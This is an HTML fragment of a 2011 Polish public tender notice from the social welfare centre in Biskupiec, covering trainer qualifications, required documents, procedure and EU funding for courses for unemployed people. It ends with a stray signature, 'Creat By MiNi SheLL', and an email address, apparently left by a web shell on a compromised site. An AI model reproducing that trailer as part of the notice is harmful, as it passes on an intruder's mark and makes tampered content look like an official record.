3) dla części III: jednym ekspertem-wykładowcą  wykształcenie wyższe prawnicze oraz minimum 2 letnie doświadczenie w prowadzeniu tego typu zajęć dla osób bezrobotnych zagrożonych wykluczeniem społecznym,
4) dla części IV: jednym wykładowcą z minimum rocznym doświadczeniu wykładowcy dla osób bezrobotnych zagrożonych wykluczeniem społecznym,
5) dla części V: jednym wykładowcą z uprawnieniami w zakresie realizacji programu Szkoła dla rodziców i wychowawców,
6) dla części VI: doradcą-ekspertem ( wykształcenie wyższe kierunkowe w zakresie doradztwa zawodowego lub licencja doradcy zawodowego) oraz minimum 2 letnie doświadczenie w realizacji tego typu zajęć dla osób bezrobotnych zagrożonych wykluczeniem społecznym,
7) dla części VII: jednym wykładowcą-ekspertem ( wykształcenie wyższe o kierunku psychologia lub socjologia lub tytuł trenera   grupowego umiejętności psychologicznych ) oraz minimum 2   letnie doświadczenie w realizacji tego typu zajęć dla osób bezrobotnych zagrożonych wykluczeniem społecznym,
8) dla części VIII: jedną osobą z uprawnieniami do prawidłowego wykonania zadania(np.: fizjoterapeuta) oraz minimum roczne doświadczenie w realizacji tego typu zajęć dla osób bezrobotnych zagrożonych wykluczeniem społecznym,
9) dla części IX: jedną osobą posiadającą odpowiednie uprawnienia do prawidłowego wykonania zadania ( np.; terapeuta zajęciowy) oraz minimum roczne doświadczenie w realizacji tego typu zajęć dla osób bezrobotnych zagrożonych wykluczeniem społecznym.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo zmiany liczby osób uczestniczących w szkoleniach-warsztatach, w przypadku wystąpienia okoliczności uzasadniających niemożność przeprowadzenia szkolenia dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, jednak nie więcej niż o 20%.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.biskupiec.pl/17030,17206/17206/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiający: Miejski Ośrodek Pomocy Społecznej
Adres: 11-300 Biskupiec, ul. Niepodległości 3
Tel.: 89 715 25 13, fax: 89 715 22 60.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2011 godzina 10:00, miejsce: w siedzibie zamawiającego - Miejski Ośrodek Pomocy Społecznej, 11-300 Biskupiec, ul. Niepodległości 3 pokój nr 2-sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  systemowy Wyrównywanie szans w dostępie do zatrudnienia - program aktywizacji społeczno - zawodowej bezrobotnych realizowany w Gminie BIskupiec w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki 2007 - 2013, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.Nr projektu: 0D4B-5BC9-FA3F-ACD3.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com